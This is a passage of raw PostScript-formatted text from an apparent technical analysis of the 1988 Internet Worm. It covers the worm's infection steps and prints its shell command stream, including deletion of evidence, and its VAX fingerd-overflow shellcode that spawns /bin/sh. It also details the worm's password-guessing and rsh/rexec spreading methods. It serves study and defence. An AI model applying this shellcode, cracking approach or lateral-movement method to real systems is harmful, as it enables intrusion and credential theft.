4515(the)S
4675(vector)S
4962(to)S
5373 V
970(contact)S
1288(it.)S
5529 V
720(3\))S
970(The)S
1157(vector)S
1438(program)S
1809(then)S
2014(connected)S
2451(to)S
2562(the)S
2717(``server,'')S
3150(sent)S
3344(the)S
3499(challenge)S
3914(string,)S
4200(and)S
4377(transferred)S
4841(three)S
5649 V
970(\256les:)S
1201(a)S
1281(Sun)S
1473(3)S
1559(binary)S
1850(version)S
2180(of)S
2299(the)S
2457(Worm,)S
2772(a)S
2851(V)S
8 R
2923(AX)S
10 R
3074(version,)S
3428(and)S
3607(the)S
3764(source)S
4059(code)S
4282(for)S
4433(the)S
4590(vector)S
4874(pro-)S
5769 V
970(gram.)S
1268(After)S
1516(the)S
1676(\256les)S
1881(were)S
2112(copied,)S
2441(the)S
2601(running)S
2950(vector)S
3237(program)S
3613(became)S
3955(\(via)S
4148(the)S
10 I
4309(execl)S
10 R
4552(call\))S
4768(a)S
4851(shell)S
5889 V
970(with)S
1178(its)S
1303(input)S
1539(and)S
1713(output)S
1999(still)S
2180(connected)S
2614(to)S
2722(the)S
2874(server)S
3147(Worm.)S
6045 V
720(4\))S
970(The)S
1155(server)S
1428(Worm)S
1713(sent)S
1904(the)S
2056(following)S
2475(command)S
2899(stream)S
3195(to)S
3303(the)S
3455(connected)S
3889(shell:)S
6238 V
12 C
970(PATH=/bin:/usr/bin:/usr/ucb)S
6371 V
970(rm)S
1186(-f)S
1402(sh)S
6504 V
970(if)S
1186([)S
1330(-f)S
1546(sh)S
1762(])S
6637 V
970(then)S
6770 V
970(P=x14481910)S
6903 V
970(else)S
7036 V
970(P=sh)S
7169 V
970(fi)S
7920 V
EP
%%Page: 8 9
BP
/slant 0 def
/height 1.000000 def
12 C
12 C
480 V
10 R
2792(- 8 -)S
840 V
970(Then,)S
1238(for)S
1392(each)S
1612(binary)S
1905(\256le)S
2071(it)S
2165(had)S
2347(transferred)S
2816(\(just)S
3032(two)S
3221(in)S
3338(this)S
3522(case,)S
3757(although)S
4146(the)S
4307(code)S
4534(is)S
4640(written)S
4962(to)S
960 V
970(allow)S
1222(more\),)S
1515(it)S
1601(would)S
1881(send)S
2094(the)S
2246(following)S
2665(form)S
2889(of)S
3002(command)S
3426(sequence:)S
1153 V
12 C
970(cc)S
1186(-o)S
1402($P)S
1618(x14481910,sun3.o)S
1286 V
970(./$P)S
1330(-p)S
1546($$)S
1762(x14481910,sun3.o)S
2986(x14481910,vax.o)S
4138(x14481910,l1.c)S
1419 V
970(rm)S
1186(-f)S
1402($P)S
1599 V
10 R
970(The)S
10 I
1170(rm)S
10 R
1326(would)S
1621(succeed)S
1981(only)S
2204(if)S
2310(the)S
2477(linked)S
2772(version)S
3111(of)S
3239(the)S
3406(Worm)S
3706(failed)S
3978(to)S
4101(start)S
4318(execution.)S
4806(If)S
4918(the)S
1719 V
970(server)S
1246(determined)S
1728(that)S
1911(the)S
2066(host)S
2266(was)S
2454(now)S
2659(infected,)S
3038(it)S
3126(closed)S
3413(the)S
3567(connection.)S
4092(Otherwise,)S
4559(it)S
4647(would)S
4929(try)S
1839 V
970(the)S
1130(other)S
1373(binary)S
1666(\256le.)S
1857(After)S
2106(both)S
2323(binary)S
2617(\256les)S
2823(had)S
3006(been)S
3233(tried,)S
3480(it)S
3575(would)S
3864(send)S
4086(over)S
10 I
4302(rm)S
10 R
4452(commands)S
4924(for)S
1959 V
970(the)S
1122(object)S
1396(\256les)S
1593(to)S
1701(clear)S
1924(away)S
2164(all)S
2294(evidence)S
2678(of)S
2791(the)S
2943(attempt)S
3273(at)S
3375(infection.)S
2115 V
720(5\))S
970(The)S
1161(new)S
1363(Worm)S
1655(on)S
1792(the)S
1951(infected)S
2309(host)S
2513(proceeded)S
2959(to)S
3074(``hide'')S
3415(itself)S
3652(by)S
3789(obscuring)S
4220(its)S
4352(argument)S
4766(vector,)S
2235 V
970(unlinking)S
1389(the)S
1546(binary)S
1836(version)S
2165(of)S
2283(itself,)S
2543(and)S
2722(killing)S
3019(its)S
3149(parent)S
3433(\(the)S
3622($$)S
3756(argument)S
4167(in)S
4279(the)S
4435(invocation\).)S
4979(It)S
2355 V
970(then)S
1188(read)S
1405(into)S
1607(memory)S
1986(each)S
2214(of)S
2343(the)S
2511(Worm)S
2812(binary)S
3113(\256les,)S
3351(encrypted)S
3790(each)S
4018(\256le)S
4193(after)S
4422(reading)S
4768(it,)S
4896(and)S
2475 V
970(deleted)S
1288(the)S
1440(\256les)S
1637(from)S
1861(disk.)S
2631 V
720(6\))S
970(Next,)S
1229(the)S
1391(new)S
1597(Worm)S
1892(gathered)S
2275(information)S
2788(about)S
3051(network)S
3419(interfaces)S
3847(and)S
4032(hosts)S
4279(to)S
4398(which)S
4683(the)S
4846(local)S
2751 V
970(machine)S
1349(was)S
1545(connected.)S
2045(It)S
2147(built)S
2372(lists)S
2575(of)S
2699(these)S
2945(in)S
3064(memory,)S
3463(including)S
3882(information)S
4395(about)S
4658(canonical)S
2871 V
970(and)S
1158(alternate)S
1545(names)S
1844(and)S
2033(addresses.)S
2515(It)S
2621(gathered)S
3009(some)S
3265(of)S
3393(this)S
3583(information)S
4100(by)S
4245(making)S
4590(direct)S
10 I
4862(ioctl)S
2991 V
10 R
970(calls,)S
1209(and)S
1384(by)S
1515(running)S
1857(the)S
10 I
2010(netstat)S
10 R
2308(program)S
2677(with)S
2887(various)S
3213(arguments.)S
2941 V
7 R
3654(*)S
2991 V
10 R
3721(It)S
3814(also)S
4007(read)S
4210(through)S
4553(various)S
4879(sys-)S
3111 V
970(tem)S
1150(\256les)S
1347(looking)S
1683(for)S
1829(host)S
2026(names)S
2311(to)S
2419(add)S
2593(to)S
2701(its)S
2826(database.)S
3267 V
720(7\))S
970(It)S
1066(randomized)S
1572(the)S
1729(lists)S
1926(of)S
2044(hosts)S
2285(it)S
2376(constructed,)S
2896(then)S
3103(attempted)S
3532(to)S
3645(infect)S
3907(some)S
4153(of)S
4271(them.)S
4561(For)S
4735(directly)S
3387 V
970(connected)S
1407(networks,)S
1831(it)S
1920(created)S
2240(a)S
2317(list)S
2473(of)S
2589(possible)S
2950(host)S
3150(numbers)S
3527(and)S
3703(attempted)S
4129(to)S
4239(infect)S
4498(those)S
4741(hosts)S
4979(if)S
3507 V
970(they)S
1181(existed.)S
1558(Depending)S
2035(on)S
2174(whether)S
2534(the)S
2696(host)S
2903(was)S
3098(remote)S
3415(or)S
3538(attached)S
3910(to)S
4028(a)S
4112(local)S
4346(area)S
4551(network)S
4918(the)S
3627 V
970(Worm)S
1271(\256rst)S
1472(tried)S
1700(to)S
1823(establish)S
2218(a)S
2307(connection)S
2790(on)S
2935(the)S
10 I
3102(telnet)S
10 R
3369(or)S
10 I
3497(rexec)S
10 R
3757(ports)S
4002(to)S
4125(determine)S
4569(reachability)S
3747 V
970(before)S
1254(it)S
1340(attempted)S
1764(an)S
1888(infection.)S
3903 V
720(8\))S
970(The)S
1155(infection)S
1540(attempts)S
1909(proceeded)S
2348(by)S
2478(one)S
2652(of)S
2765(three)S
2994(routes:)S
10 I
3296(rsh,)S
3479(fingerd,)S
10 R
3823(or)S
10 I
3936(sendmail)S
10 R
4297(.)S
4059 V
970(8a\))S
1220(The)S
1406(attack)S
1675(via)S
10 I
1828(rsh)S
10 R
1987(was)S
2173(done)S
2398(by)S
2529(attempting)S
2988(to)S
3097(spawn)S
3383(a)S
3458(remote)S
3766(shell)S
3986(by)S
4118(invocation)S
4572(of)S
4687(\(in)S
4830(order)S
4179 V
1220(of)S
1334(trial\))S
1559(/usr/ucb/rsh,)S
2087(/usr/bin/rsh,)S
2599(and)S
2774(/bin/rsh.)S
3166(If)S
3263(successful,)S
3729(the)S
3882(host)S
4080(was)S
4266(infected)S
4618(as)S
4732(in)S
4840(steps)S
4299 V
1220(1)S
1300(and)S
1474(2a,)S
1623(above.)S
4455 V
970(8b\))S
1220(The)S
1410(attack)S
1683(via)S
1840(the)S
10 I
1997(finger)S
10 R
2271(daemon)S
2622(was)S
2812(somewhat)S
3252(more)S
3493(subtle.)S
3823(A)S
3931(connection)S
4405(was)S
4596(established)S
4575 V
1220(to)S
1335(the)S
1494(remote)S
10 I
1808(finger)S
10 R
2083(server)S
2362(daemon)S
2714(and)S
2894(then)S
3102(a)S
3182(specially)S
3573(constructed)S
4069(string)S
4333(of)S
4452(536)S
4638(bytes)S
4885(was)S
4695 V
1220(passed)S
1533(to)S
1658(the)S
1827(daemon,)S
2215(over\257owing)S
2745(its)S
2887(512)S
3084(byte)S
3303(input)S
3556(bu)S
3656 H
	(f)show 10 -.5 mul h (f)show
10 R
3717(er)S
3841(and)S
4032(overwriting)S
4545(parts)S
4787(of)S
4918(the)S
4815 V
1220(stack.)S
1514(For)S
1687(standard)S
2059(4)S
2143(BSD)S
2372(versions)S
2739(running)S
3084(on)S
3218(V)S
8 R
3290(AX)S
10 R
3440(computers,)S
3915(the)S
4070(over\257ow)S
4458(resulted)S
4807(in)S
4918(the)S
4935 V
1220(return)S
1492(stack)S
1731(frame)S
1997(for)S
2147(the)S
10 I
2303(main)S
10 R
2537(routine)S
2854(being)S
3110(changed)S
3476(so)S
3600(that)S
3785(the)S
3942(return)S
4215(address)S
4549(pointed)S
4884(into)S
5055 V
1220(the)S
1374(bu)S
1474 H
	(f)show 10 -.5 mul h (f)show
10 R
1535(er)S
1644(on)S
1776(the)S
1930(stack.)S
2222(The)S
2409(instructions)S
2908(that)S
3090(were)S
3315(written)S
3630(into)S
3818(the)S
3972(stack)S
4209(at)S
4313(that)S
4494(location)S
4847(were)S
5175 V
1220(a)S
1294(series)S
1551(of)S
1664(no-ops)S
1966(followed)S
2351(by:)S
5368 V
12 C
1220(pushl)S
1920($68732f)S
2970('/sh\\0')S
5501 V
1220(pushl)S
1920($6e69622f)S
2620('/bin')S
5634 V
1220(movl)S
1920(sp,)S
2208(r10)S
5767 V
1220(pushl)S
1920($0)S
5900 V
1220(pushl)S
1920($0)S
6033 V
1220(pushl)S
1920(r10)S
6166 V
1220(pushl)S
1920($3)S
6299 V
1220(movl)S
1920(sp,ap)S
6432 V
1220(chmk)S
1920($3b)S
6612 V
10 R
1220(That)S
1433(is,)S
1555(the)S
1707(code)S
1925(executed)S
2309(when)S
2555(the)S
10 I
2707(main)S
10 R
2937(routine)S
3250(attempted)S
3674(to)S
3782(return)S
4050(was:)S
6862 V
8 Y1
720(333333333333333333)S
6980 V
8 R
820(*)S
900(Ioctl)S
1073(is)S
1154(a)S
1217(U)S
6 R
1275(NIX)S
8 R
1409(call)S
1551(to)S
1641(do)S
1749(device)S
1984(queries)S
2241(and)S
2384(control.)S
2681(Netstat)S
2935(is)S
3017(a)S
3081(status)S
3291(and)S
3435(monitor)S
3716(program)S
4014(showing)S
4314(the)S
4440(state)S
4614(of)S
7080 V
720(network)S
1005(connections.)S
7920 V
EP
%%Page: 9 10
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2792(- 9 -)S
900 V
2676(execve\("/bin/sh",)S
3395(0,)S
3500(0\))S
1080 V
1220(On)S
1381(V)S
8 R
1453(AX)S
10 R
1569(en,)S
1727(this)S
1911(resulted)S
2266(in)S
2383(the)S
2544(Worm)S
2838(connected)S
3281(to)S
3399(a)S
3483(remote)S
3800(shell)S
4029(via)S
4191(the)S
4353(TCP)S
4577(connection.)S
1200 V
1220(The)S
1409(Worm)S
1698(then)S
1904(proceeded)S
2347(to)S
2459(infect)S
2720(the)S
2876(host)S
3077(as)S
3194(in)S
3305(steps)S
3538(1)S
3621(and)S
3798(2a,)S
3950(above.)S
4276(On)S
4431(Suns,)S
4684(this)S
4862(sim-)S
1320 V
1220(ply)S
1393(resulted)S
1754(in)S
1878(a)S
1968(core)S
2185(dump)S
2459(since)S
2710(the)S
2878(code)S
3112(was)S
3313(not)S
3487(in)S
3611(place)S
3867(to)S
3991(corrupt)S
4325(a)S
4415(Sun)S
4617(version)S
4957(of)S
1440 V
10 I
1220(fingerd)S
10 R
1546(in)S
1661(a)S
1742(similar)S
2057(fashion.)S
2443(Curiously,)S
2900(correct)S
3213(machine-speci\256c)S
3925(code)S
4149(to)S
4263(corrupt)S
4587(Suns)S
4818(could)S
1560 V
1220(have)S
1438(been)S
1656(written)S
1969(in)S
2077(a)S
2151(matter)S
2436(of)S
2549(hours)S
2801(and)S
2975(included)S
3349(but)S
3507(was)S
3692(not.)S
3875([26])S
1716 V
970(8c\))S
1220(The)S
1406(Worm)S
1692(then)S
1895(tried)S
2109(to)S
2218(infect)S
2476(the)S
2629(remote)S
2937(host)S
3135(by)S
3266(establishing)S
3775(a)S
3851(connection)S
4321(to)S
4431(the)S
4585(SMTP)S
4879(port)S
1836 V
1220(and)S
1394(mailing)S
1730(an)S
1854(infection,)S
2264(as)S
2377(in)S
2485(step)S
2676(2b,)S
2831(above.)S
1992 V
720(Not)S
910(all)S
1050(the)S
1212(steps)S
1452(were)S
1685(attempted.)S
2174(As)S
2325(soon)S
2554(as)S
2677(one)S
2861(method)S
3201(succeeded,)S
3675(the)S
3837(host)S
4044(entry)S
4289(in)S
4408(the)S
4571(internal)S
4917(list)S
2112 V
720(was)S
905(marked)S
1234(as)S
10 I
1347(infected)S
10 R
1693(and)S
1867(the)S
2019(other)S
2254(methods)S
2623(were)S
2846(not)S
3004(attempted.)S
2268 V
720(9\))S
970(Next,)S
1220(it)S
1307(entered)S
1631(a)S
1706(state)S
1920(machine)S
2289(consisting)S
2727(of)S
2842(\256ve)S
3024(states.)S
3333(Each)S
3564(state)S
3779(but)S
3939(the)S
4093(last)S
4264(was)S
4451(run)S
4616(for)S
4764(a)S
4840(short)S
2388 V
970(while,)S
1252(then)S
1459(the)S
1616(program)S
1989(looped)S
2296(back)S
2519(to)S
2632(step)S
2828(#7)S
2963(\(attempting)S
3459(to)S
3572(break)S
3828(into)S
4019(other)S
4258(hosts)S
4498(via)S
10 I
4654(sendmail,)S
2508 V
970(finger,)S
10 R
1274(or)S
10 I
1397(rsh)S
10 R
1525(\).)S
1653(The)S
1848(\256rst)S
2044(four)S
2250(of)S
2373(the)S
2535(\256ve)S
2725(states)S
2988(were)S
3222(attempts)S
3602(to)S
3721(break)S
3983(into)S
4180(user)S
4387(accounts)S
4777(on)S
4918(the)S
2628 V
970(local)S
1198(machine.)S
1625(The)S
1814(\256fth)S
2015(state)S
2232(was)S
2421(the)S
2577(\256nal)S
2789(state,)S
3031(and)S
3209(occurred)S
3591(after)S
3807(all)S
3941(attempts)S
4314(had)S
4492(been)S
4713(made)S
4962(to)S
2748 V
970(break)S
1222(all)S
1353(passwords.)S
1855(In)S
1969(the)S
2122(\256fth)S
2320(state,)S
2559(the)S
2712(Worm)S
2998(looped)S
3301(forever)S
3620(trying)S
3891(to)S
4001(infect)S
4260(hosts)S
4498(in)S
4608(its)S
4735(internal)S
2868 V
970(tables)S
1233(and)S
1407(marked)S
1736(as)S
1849(not)S
2007(yet)S
2159(infected.)S
2565(The)S
2750(\256rst)S
2936(four)S
3132(states)S
3384(were:)S
3024 V
970(9a\))S
1220(The)S
1426(Worm)S
1732(read)S
1954(through)S
2316(the)S
10 I
2489(/etc/hosts.equiv)S
10 R
3159(\256les)S
3377(and)S
10 I
3572(/.rhosts)S
10 R
3921(\256les)S
4139(to)S
4268(\256nd)S
4476(the)S
4650(names)S
4957(of)S
3144 V
10 I
1220(equivalent)S
10 R
1680(hosts.)S
1984(These)S
2265(were)S
2501(marked)S
2843(in)S
2964(the)S
3129(internal)S
3477(table)S
3714(of)S
3840(hosts.)S
4144(Next,)S
4406(the)S
4571(Worm)S
4869(read)S
3264 V
10 I
1220(/etc/passwd)S
10 R
1724(\(the)S
1917(account)S
2265(and)S
2447(password)S
2862(\256le\))S
3061(into)S
3255(an)S
3387(internal)S
3730(data)S
3934(structure.)S
4376(As)S
4525(it)S
4619(was)S
4812(doing)S
3384 V
1220(this,)S
1421(it)S
1508(also)S
1700(examined)S
2119(the)S
10 I
2272(.forward)S
10 R
2651(\256le)S
2809(\(used)S
3055(to)S
3163(forward)S
3508(mail)S
3716(to)S
3824(a)S
3898(di)S
3976 H
	(f)show 10 -.5 mul h (f)show
10 R
4037(erent)S
4266(host)S
4463(automatically\))S
3504 V
1220(in)S
1332(each)S
1548(user)S
1748(home)S
2004(directory)S
2398(and)S
2576(included)S
2954(any)S
3133(new)S
3334(host)S
3536(names)S
3826(into)S
4017(its)S
4147(internal)S
4487(table)S
4716(of)S
4834(hosts)S
3624 V
1220(to)S
1328(try.)S
1524(Oddly,)S
1829(it)S
1915(did)S
2073(not)S
2231(similarly)S
2617(check)S
2879(user)S
10 I
3075(.rhosts)S
10 R
3375(\256les.)S
3780 V
970(9b\))S
1220(The)S
1420(Worm)S
1720(attempted)S
2159(to)S
2282(break)S
2548(each)S
2775(user)S
2986(password)S
3408(using)S
3670(simple)S
3982(choices.)S
4382(The)S
4583(Worm)S
4884(\256rst)S
3900 V
1220(checked)S
1579(the)S
1734(obvious)S
2084(case)S
2288(of)S
2404(no)S
2537(password.)S
3002(Then,)S
3265(it)S
3354(used)S
3570(the)S
3725(account)S
4068(name)S
4317(and)S
4493(user)S
4691(informa-)S
4020 V
1220(tion)S
1416(\256eld)S
1634(to)S
1752(try)S
1903(simple)S
2210(passwords.)S
2722(Assume)S
3085(that)S
3276(the)S
3439(user)S
3646(had)S
3831(an)S
3966(entry)S
4212(in)S
4331(the)S
4494(password)S
4912(\256le)S
4140 V
1220(like:)S
4320 V
1881(account:abcedfghijklm:100:5:User,)S
3323(Name:/usr/account:/bin/sh)S
4500 V
1220(\(These)S
1551(represent,)S
2001(respectively,)S
2569(the)S
2752(account)S
3123(name,)S
3425(the)S
3608(encrypted)S
4062(password,)S
4525(the)S
4708(user)S
4935(ID)S
4620 V
1220(number,)S
1587(the)S
1745(user's)S
2019(default)S
2332(group)S
2601(ID)S
2742(number,)S
3108(per-user)S
3470(information)S
3978(\256eld,)S
4217(the)S
4375(pathname)S
4799(of)S
4918(the)S
4740 V
1220(user's)S
1497(home)S
1758(account,)S
2132(and)S
2315(the)S
2476(pathname)S
2903(of)S
3025(the)S
3186(user's)S
3464(default)S
3781(command)S
4215(interpreter)S
4670(or)S
10 I
4793(shell.)S
10 R
5007(\))S
4860 V
1220(The)S
1407(words)S
1682(tried)S
1896(as)S
2010(potential)S
2391(passwords)S
2838(would)S
3119(be)S
10 I
3244(account,)S
3616(accountaccount,)S
4304(User,)S
4554(Name,)S
4843(user,)S
4980 V
1220(name)S
10 R
1436(,)S
1491(and)S
10 I
1665(tnuocca.)S
10 R
2036(These)S
2304(are,)S
2480(respectively,)S
3017(the)S
3169(account)S
3509(name,)S
3780(the)S
3932(account)S
4273(name)S
4520(concatenated)S
5100 V
1220(with)S
1441(itself,)S
1709(the)S
1874(\256rst)S
2073(and)S
2260(last)S
2442(names)S
2740(of)S
2866(the)S
3030(user,)S
3263(the)S
3427(user)S
3635(names)S
3932(with)S
4152(leading)S
4488(capital)S
4796(letters)S
5220 V
1220(turned)S
1506(to)S
1615(lower)S
1873(case,)S
2100(and)S
2275(the)S
2428(account)S
2769(name)S
3016(reversed.)S
3439(Experience)S
3918(described)S
4332(in[13])S
4608(shows)S
4890(that)S
5340 V
1220(on)S
1351(systems)S
1698(where)S
1971(users)S
2206(are)S
2357(naive)S
2603(about)S
2855(proper)S
3145(password)S
3552(security,)S
3923(these)S
4158(choices)S
4487(may)S
4689(work)S
4924(for)S
5460 V
1220(a)S
1294(signi\256cant)S
1741(percentage)S
2202(of)S
2315(user)S
2511(accounts.)S
5616 V
1220(Step)S
1428(10)S
1558(in)S
1666(this)S
1841(section)S
2154(describes)S
2555(what)S
2779(was)S
2964(done)S
3188(if)S
3279(a)S
3353(password)S
3760(``hit'')S
4028(was)S
4213(achieved.)S
5772 V
970(9c\))S
1220(The)S
1413(third)S
1640(stage)S
1883(in)S
1999(the)S
2159(process)S
2496(involved)S
2884(trying)S
3161(to)S
3277(break)S
3537(the)S
3698(password)S
4114(of)S
4236(each)S
4457(user)S
4662(by)S
4801(trying)S
5892 V
1220(each)S
1444(word)S
1690(present)S
2019(in)S
2138(an)S
2273(internal)S
2619(dictionary)S
3065(of)S
3189(words)S
3474(\(available)S
3908(in)S
4027([26]\).)S
4292(This)S
4511(dictionary)S
4957(of)S
6012 V
1220(432)S
1408(words)S
1690(was)S
1883(tried)S
2104(against)S
2425(each)S
2645(account)S
2993(in)S
3109(a)S
3191(random)S
3534(order,)S
3808(with)S
4025(``hits'')S
4341(being)S
4602(handled)S
4957(as)S
6132 V
1220(described)S
1632(in)S
1740(step)S
1931(10,)S
2086(below.)S
6288 V
970(9d\))S
1220(The)S
1405(fourth)S
1679(stage)S
1915(was)S
2101(entered)S
2425(if)S
2517(all)S
2648(other)S
2884(attempts)S
3254(failed.)S
3567(For)S
3737(each)S
3950(word)S
4186(in)S
4295(the)S
4448(online)S
4729(diction-)S
6408 V
1220(ary,)S
1409(the)S
1568(Worm)S
1860(would)S
2147(see)S
2311(if)S
2409(it)S
2501(was)S
2692(the)S
2850(password)S
3263(to)S
3377(any)S
3557(account.)S
3958(In)S
4077(addition,)S
4466(if)S
4563(the)S
4721(word)S
4962(in)S
6528 V
1220(the)S
1373(dictionary)S
1809(began)S
2079(with)S
2289(an)S
2415(upper)S
2674(case)S
2877(letter,)S
3139(the)S
3293(letter)S
3530(was)S
3717(converted)S
4142(to)S
4252(lower)S
4511(case)S
4714(and)S
4890(that)S
6648 V
1220(word)S
1455(was)S
1640(also)S
1831(tried)S
2044(against)S
2357(all)S
2487(the)S
2639(passwords.)S
6804 V
720(10\))S
970(Once)S
1230(a)S
1324(password)S
1751(was)S
1956(broken)S
2283(for)S
2449(any)S
2643(account,)S
3028(the)S
3200(Worm)S
3505(would)S
3805(attempt)S
4155(to)S
4284(break)S
4556(into)S
4763(remote)S
6924 V
970(machines)S
1378(where)S
1652(that)S
1833(user)S
2030(had)S
2205(accounts.)S
2640(The)S
2826(Worm)S
3112(would)S
3393(scan)S
3601(the)S
10 I
3754(.forward)S
10 R
4133(and)S
10 I
4308(.rhosts)S
10 R
4608(\256les)S
4805(of)S
4918(the)S
7044 V
970(user)S
1168(at)S
1272(this)S
1450(point,)S
1714(and)S
1891(identify)S
2235(the)S
2390(names)S
2678(of)S
2794(remote)S
3104(hosts)S
3343(that)S
3526(had)S
3703(accounts)S
4085(used)S
4301(by)S
4434(the)S
4589(target)S
4849(user.)S
7164 V
970(It)S
1061(then)S
1263(attempted)S
1687(two)S
1867(attacks:)S
7920 V
EP
%%Page: 10 11
BP
/slant 0 def
/height 1.000000 def
10 R
10 R
480 V
2767(- 10 -)S
840 V
970(10a\))S
1220(The)S
1408(Worm)S
1696(would)S
1979(\256rst)S
2168(attempt)S
2501(to)S
2612(create)S
2882(a)S
2959(remote)S
3269(shell)S
3491(using)S
3741(the)S
10 I
3896(rexec)S
790 V
7 R
4111(*)S
840 V
10 R
4180(service.)S
4551(The)S
4740(attempt)S
960 V
1220(would)S
1510(be)S
1644(made)S
1900(using)S
2157(the)S
2319(account)S
2669(name)S
2925(given)S
3187(in)S
3305(the)S
10 I
3467(.forward)S
10 R
3855(or)S
10 I
3978(.rhosts)S
10 R
4288(\256le)S
4456(and)S
4640(the)S
4802(user's)S
1080 V
1220(local)S
1453(password.)S
1924(This)S
2141(took)S
2358(advantage)S
2801(of)S
2924(users')S
3202(tendency)S
3602(to)S
3720(use)S
3893(the)S
4055(same)S
4300(password)S
4717(on)S
4857(their)S
1200 V
1220(accounts)S
1599(on)S
1729(multiple)S
2093(machines.)S
1356 V
970(10b\))S
1220(The)S
1415(Worm)S
1710(would)S
2000(do)S
2140(a)S
10 I
2224(rexec)S
10 R
2479(to)S
2598(the)S
2761(current)S
3084(host)S
3292(\(using)S
3583(the)S
3746(local)S
3981(user)S
4188(name)S
4445(and)S
4630(password\))S
1476 V
1220(and)S
1408(would)S
1702(try)S
1857(a)S
10 I
1945(rsh)S
10 R
2117(command)S
2555(to)S
2677(the)S
2843(remote)S
3164(host)S
3375(using)S
3636(the)S
3801(username)S
4226(taken)S
4485(from)S
4722(the)S
4887(\256le.)S
1596 V
1220(This)S
1432(attack)S
1704(would)S
1989(succeed)S
2339(when)S
2590(the)S
2747(remote)S
3059(machine)S
3432(had)S
3611(a)S
3690(hosts.equiv)S
4178(\256le)S
4341(or)S
4459(the)S
4616(user)S
4817(had)S
4996(a)S
1716 V
10 I
1220(.rhosts)S
10 R
1520(\256le)S
1678(that)S
1858(allowed)S
2204(remote)S
2511(execution)S
2929(without)S
3265(a)S
3339(password.)S
1836 V
970(If)S
1072(the)S
1231(remote)S
1545(shell)S
1771(was)S
1963(created)S
2287(either)S
2551(way,)S
2779(the)S
2938(attack)S
3213(would)S
3500(continue)S
3881(as)S
4001(in)S
4116(steps)S
4353(1)S
4440(and)S
4621(2a,)S
4777(above.)S
1956 V
970(No)S
1122(other)S
1357(use)S
1520(was)S
1705(made)S
1951(of)S
2064(the)S
2216(user)S
2412(password.)S
2112 V
970(Throughout)S
1481(the)S
1642(execution)S
2069(of)S
2191(the)S
2352(main)S
2592(loop,)S
2835(the)S
2997(Worm)S
3292(would)S
3582(check)S
3854(for)S
4010(other)S
4255(Worms)S
4589(running)S
4940(on)S
2232 V
720(the)S
873(same)S
1109(machine.)S
1533(To)S
1675(do)S
1806(this,)S
2007(the)S
2160(Worm)S
2446(would)S
2727(attempt)S
3058(to)S
3166(connect)S
3506(to)S
3614(another)S
3943(Worm)S
4228(on)S
4358(a)S
4432(local,)S
4681(predeter-)S
2352 V
720(mined)S
1001(TCP)S
1216(socket.)S
2302 V
7 R
1496(\262)S
2352 V
10 R
1562(If)S
1660(such)S
1875(a)S
1951(connection)S
2421(succeeded,)S
2887(one)S
3063(Worm)S
3350(would)S
3632(\(randomly\))S
4113(set)S
4256(an)S
4382(internal)S
4719(variable)S
2472 V
720(named)S
10 I
1018(pleasequit)S
10 R
1461(to)S
1571(1,)S
1678(causing)S
2015(that)S
2196(Worm)S
2482(to)S
2591(exit)S
2772(after)S
2985(it)S
3072(had)S
3247(reached)S
3587(part)S
3773(way)S
3970(into)S
4157(the)S
4310(third)S
4530(stage)S
4766(\(9c\))S
4957(of)S
2592 V
720(password)S
1138(cracking.)S
1577(This)S
1796(delay)S
2053(is)S
2162(part)S
2359(of)S
2484(the)S
2648(reason)S
2950(many)S
3214(systems)S
3573(had)S
3759(multiple)S
4135(Worms)S
4471(running:)S
4852(even)S
2712 V
720(though)S
1038(a)S
1122(Worm)S
1417(would)S
1707(check)S
1979(for)S
2135(other)S
2380(local)S
2614(Worms,)S
2973(it)S
3069(would)S
3359(defer)S
3603(its)S
3738(self-destruction)S
4399(until)S
4623(signi\256cant)S
2832 V
720(e)S
764 H
	(f)show 10 -.5 mul h (f)show
10 R
825(ort)S
967(had)S
1142(been)S
1361(made)S
1608(to)S
1717(break)S
1969(local)S
2194(passwords.)S
2696(Furthermore,)S
3251(race)S
3447(conditions)S
3895(in)S
4004(the)S
4157(code)S
4376(made)S
4624(it)S
4712(possible)S
2952 V
720(for)S
890(Worms)S
1238(on)S
1392(heavily)S
1740(loaded)S
2060(machines)S
2491(to)S
2623(fail)S
2810(to)S
2942(connect,)S
3331(thus)S
3552(causing)S
3911(some)S
4176(of)S
4312(them)S
4565(to)S
4696(continue)S
3072 V
720(inde\256nitely)S
1206(despite)S
1519(the)S
1671(presence)S
2049(of)S
2162(other)S
2397(Worms.)S
3228 V
970(One)S
1188(out)S
1369(of)S
1505(every)S
1779(seven)S
2059(Worms)S
2406(would)S
2709(become)S
3072(``immortal'')S
3624(rather)S
3909(than)S
4134(check)S
4419(for)S
4588(other)S
4846(local)S
3348 V
720(Worms.)S
1107(Based)S
1389(on)S
1527(a)S
1609(generated)S
2034(random)S
2377(number)S
2720(they)S
2930(would)S
3218(set)S
3367(an)S
3499(internal)S
3842(\257ag)S
4030(that)S
4217(would)S
4504(prevent)S
4840(them)S
3468 V
720(from)S
944(ever)S
1145(looking)S
1481(for)S
1627(another)S
1956(Worm)S
2241(on)S
2372(their)S
2586(host.)S
2839(This)S
3048(may)S
3251(have)S
3470(been)S
3689(done)S
3914(to)S
4023(defeat)S
4297(any)S
4472(attempt)S
4803(to)S
4912(put)S
3588 V
720(a)S
801(fake)S
1009(Worm)S
1301(process)S
1637(on)S
1774(the)S
1933(TCP)S
2154(port)S
2352(to)S
2467(kill)S
2638(existing)S
2992(Worms.)S
3378(Whatever)S
3802(the)S
3961(reason,)S
4282(this)S
4463(was)S
4654(likely)S
4918(the)S
3708 V
720(primary)S
1066(cause)S
1317(of)S
1430(machines)S
1837(being)S
2089(overloaded)S
2562(with)S
2770(multiple)S
3134(copies)S
3419(of)S
3532(the)S
3684(Worm.)S
3864 V
970(The)S
1171(Worm)S
1472(attempted)S
1912(to)S
2036(send)S
2265(a)S
2355(UDP)S
2601(packet)S
2907(to)S
3031(the)S
3199(host)S
3412(ernie.berkeley.edu)S
3814 V
7 R
4148(\263)S
3864 V
10 R
4229(approximately)S
4852(once)S
3984 V
720(every)S
973(15)S
1105(infections,)S
1556(based)S
1815(on)S
1947(a)S
2023(random)S
2360(number)S
2697(comparison.)S
3250(The)S
3437(code)S
3657(to)S
3767(do)S
3899(this)S
4076(was)S
4262(incorrect,)S
4672(however,)S
4104 V
720(and)S
896(no)S
1028(information)S
1532(was)S
1720(ever)S
1924(sent.)S
2173(Whether)S
2549(this)S
2727(was)S
2915(the)S
3070(intended)S
3447(ruse)S
3646(or)S
3762(whether)S
4116(there)S
4348(was)S
4536(some)S
4780(reason)S
4224 V
720(for)S
868(the)S
1022(byte)S
1226(to)S
1336(be)S
1462(sent)S
1655(is)S
1754(not)S
1914(currently)S
2306(known.)S
